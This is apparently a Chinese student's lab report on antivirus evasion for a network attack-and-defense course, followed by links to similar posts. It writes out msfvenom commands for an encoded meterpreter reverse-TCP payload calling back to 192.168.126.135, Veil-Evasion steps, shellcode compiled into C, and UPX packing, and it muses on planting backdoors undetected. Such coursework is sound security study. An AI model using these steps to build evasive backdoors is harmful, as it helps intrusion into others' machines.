20155229《网络对抗技术》Exp3:免杀原理与实践
实验预习
免杀: 看为一种能使病毒木马避免被杀毒软件查杀的技术。
免杀的分类:
- 开源免杀:指在有病毒、木马源代码的前提下,通过修改源代码进行免杀。。
- 手工免杀:指在仅有病毒、木马的可执行文件(.exe)(PE文件)的情况下进行免杀。:
文件免杀方法:
- 加冷门壳
- 加壳改壳:在加壳的基础上进行修改。
- 加花指令:加花的原理就是通过添加加花指令让杀毒软件检测不到特征码,干扰杀毒软件正常的检测。
- 改程序入口点:修改程序入口点
实验内容
msfvenom直接生成meterpreter可执行文件
Msfvenom使用编码器
写在前面:我的文件放入主机上自动就被360杀毒杀去了,实验中我将360杀毒关去,所以没有用360进行扫描,也没有弄360扫描的结果。
- 使用
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.126.135 LPORT=5229 -f exe > fyhtvxq.exe
进行编码。
然后将其放到
http://r.virscan.org/
该网站进行检测。结果如下:
结果和我想象的不一样啊,为什么会什么都没有呢,使用
# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.126.135 LPORT=5229 -f exe > fyhtvxq.exe
进行多次编码,结果还是一样。去查了一些同学的博客,发现没有人遇到我这种问题。。。我也没找到解决的办法。。。而后来我用上周实验生成编码的方式又重新试了一遍,发现能够检测出危险。
# msfvenom -p windows/meterpreter/reverse_tcp -e LHOST=192.168.126.135 LPORT=5229 -f exe > fyhtvxq.exe
- 上周的编码是很有问题的是显而易见的,毕竟能够监控别的主机,可是很坏了,但是同时也说明有些杀毒软件连这个都没查出来,是不是有些菜啊。。。
Veil-Evasion
- Veil-Evasion是一个免杀平台,与Metasploit有点类似,用其他语言如c,c#,phython,ruby,go,powershell等重写了meterperter,然后再通过不同方式编译成exe,共性特征比较少。
输入
veil
进入平台
输入
use python/meterpreter/rev_tcp
设置payload
set LHOST 192.168.126.135
设置反弹IP地址
set LPORT 5229
设置反弹端口
generate
生成文件
- 然后对文件进行命名,但会出现错误
- 于是将程序换成C语言,重新按照上述步骤在走一遍,可以生成可执行文件
- 再将该文件放入网站中进行检测(因为刚开始找的是其他文件夹,所以又生成了好几个.exe文件,结果发现文件夹找错了)
- 本次只有10个软件检测出来了,看来veil平台生成的文件,还是有些小厉害的。
因为之前自己做的时候回连失败,而且忘记截图了,今天下午实验课,我用veil新生成的fyh5629.exe文件进行了回连,并且成功。(弥补一下之前的失败~)
C语言调用Shellcode
- 使用
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.135 LPORT=5229 -f c
命令生成一个shellcode数组
- 然后将该数组编写一个程序,用
i686-w64-mingw32-g++ shellfyh.c -o met5229.exe
命令将该代码转换为.exe文件。
- 对该.exe文件 进行检测,比veil平台的文件还要厉害些!
- 将该文件传入win7虚拟机中,想进行回连,但是立马就被我在安装win7上的360给清除了。。。
实验课我弥补了一下自己做的时候的回连失败(实验课fyh5729.exe回连成功),并且我也不知到为什么360安全卫士没有扫描出问题
- 打开VS,将shellcode数组重新编一个c代码,但是不管怎么生成,一直都会报错,在网上找了解决的方案,
项目右键->属性->配置属性->C/C++->常规->附加包含目录 输入$(ProjectDir)
- 但是还是没法编译,我只好放弃这种方法。。。
加壳
- 加壳的全称应该是可执行程序资源压缩,压缩后的程序可以直接运行。
UPX是压缩壳,减少应用体积。
使用命令
upx 需要加壳的文件名 -o 加壳后的文件名
对想加壳的.exe文件进行加壳,加壳后进行检测。
- 然后使用刚加壳出炉的
fyh5229.exe
想对其进行加壳,但是失败了,不能进行多次加壳。
- 然后我将之前通过veil生成的文件进行加壳,然后检测,可是结果并没有好太多。
用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
基础问题问答
(1)杀软是如何检测出恶意代码的?
答:
我认为杀软会根据代码是否会对电脑系统、文件等做出不好的行动,来判断该代码是否为恶意代码。
在以前检测出的恶意代码的基础上,会留意与之相类似的代码,来判断。
(2)免杀是做什么?
答: 一种能使病毒木马避免被杀毒软件查杀的技术。
(3)免杀的基本方法有哪些?
答:
- 加冷门壳
- 加壳改壳:在加壳的基础上进行修改。
- 加花指令:加花的原理就是通过添加加花指令让杀毒软件检测不到特征码,干扰杀毒软件正常的检测。
- 改程序入口点:修改程序入口点
离实战还缺些什么技术或步骤?
- 怎样安全又稳妥一次的将后门程序放入其他人的主机,且不会被发现。杀毒软件在更新,人们的 防范心理也在变强,所以想让靶机的主人对文件“上当”也有难度。
实验中遇到的问题及解决
遇到的问题不管有没有解决已经在上述实验内容中了。。。
实验总结与体会
相比于上次实验的小马宝丽,这次实验给我更多的收获是,一次一次对制作出来的文件进行检测,比较每次被检测出来的比例,想要将文件的危险指数降低,这样让自己有更多的自豪感,当然也就只能做出来玩玩,毕竟不能干坏事,但是大家都会制作后门了,可能还是要防范一下大家?哈哈哈哈哈开玩笑(●'◡'●)。
20155229《网络对抗技术》Exp3:免杀原理与实践的更多相关文章
- 20145215《网络对抗》Exp3 免杀原理与实践
20145215<网络对抗>Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 基于特征来检测:恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有 ...
- 20155227《网络对抗》Exp3 免杀原理与实践
20155227<网络对抗>Exp3 免杀原理与实践 实践内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等 ...
- 20155232《网络对抗》Exp3 免杀原理与实践
20155232<网络对抗>Exp3 免杀原理与实践 问题回答 1.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 特征码:一段特征码就是一段或多段数据. 如果一个可执 ...
- 20155302《网络对抗》Exp3 免杀原理与实践
20155302<网络对抗>Exp3 免杀原理与实践 实验要求 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编 ...
- 20155323刘威良《网络对抗》Exp3 免杀原理与实践
20155323刘威良<网络对抗>Exp3 免杀原理与实践 实践内容 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellco ...
- 20155333 《网络对抗》Exp3 免杀原理与实践
20155333 <网络对抗>Exp3 免杀原理与实践 基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测: 启发式恶意软件检测: 基于行为的恶意软件检测. (2)免杀是做 ...
- 20145307陈俊达《网络对抗》Exp3 免杀原理与实践
20145307陈俊达<网络对抗>Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有程序包含的 ...
- 20155218《网络对抗》Exp3 免杀原理与实践
20155218<网络对抗>Exp3 免杀原理与实践 一.使用msf生成后门程序的检测 (1)将上周msf生成的后门文件放在virscan.org中进行扫描,截图如下: (2)使用msf时 ...
- 20155239吕宇轩《网络对抗》Exp3 免杀原理与实践
20155239吕宇轩<网络对抗>Exp3 免杀原理与实践 实验过程 Kali使用上次实验msfvenom产生后门的可执行文件,上传到老师提供的网址http://www.virscan.o ...
- 20155338《网络对抗》Exp3 免杀原理与实践
20155338<网络对抗>Exp3 免杀原理与实践 实验过程 一.免杀效果参考基准 Kali使用上次实验msfvenom产生后门的可执行文件,上传到老师提供的网址http://www.v ...
随机推荐
- R中的空间数据分析
> library(sp) > library(maptools) > library(raster) > library(rgeos) > maxd3 = readAs ...
- Linux 系统下用源码包安装软件
Linux系统下用源码包安装软件 by:授客 QQ:1033553122 下载源码安装包,解压或者直接双击打开(如果有安装zip或rar等压缩/解压缩软件的话),查找相关的安装说明文件,一般是READ ...
- Java程序流程控制:判断结构、选择结构、循环结构
本文内容: 判断结构 if 选择结构 switch 循环结构 while do-while for for each break.continue return 首发时间:2017-06-22 21: ...
- 机器学习实战(Machine Learning in Action)学习笔记————03.决策树原理、源码解析及测试
机器学习实战(Machine Learning in Action)学习笔记————03.决策树原理.源码解析及测试 关键字:决策树.python.源码解析.测试作者:米仓山下时间:2018-10-2 ...
- 【Python】zlib压缩文件
import zlib import os ss = 's' * 1024 * 1024 #写入原始文件 file = open("src.dat", "wb" ...
- PRD文档怎么写
昨天学习PMP的相关文档,正好看到里面讲的PRD文档是怎么写的 就把一些学习过程,思维方式,还有用到的工具给记录下来 方便自己以后需要的时候,再去查阅,再读这个教程的时候,我顺便用脑图画了一下 脑图工 ...
- CSS| text文本属性
注意:一般来说,可以为所有块级元素应用 text-indent,但无法将该属性应用于行内元素,图像之类的替换元素上也无法应用 text-indent 1) text-indent 取值: 5px/2 ...
- 插入图片新方式:data:image
我们在使用<img>标签和给元素添加背景图片时,不一定要使用外部的图片地址,也可以直接把图片数据定义在页面上.对于一些“小”的数据,可以在网页中直接嵌入,而不是从外部文件载入. 如何使用 ...
- JVM & GC 笔记
0. 说明 转载并修改自JVM 1. JVM 1.1 什么是JVM JVM为Java虚拟机(Java Virtual Machine) Runtime data area,运行时数据区. 包含5个区域 ...
- 李嘉诚 《Are you ready》
当你们梦想着为伟大成功的时候,你有没有刻苦的准备? 当你们有野心作领袖的时候,你有没有服务于人的谦恭? 我们常常都想有所获得,但我们有没有付出的情操? 我们都希望别人听到自己的话,我们有没有耐性聆听别 ...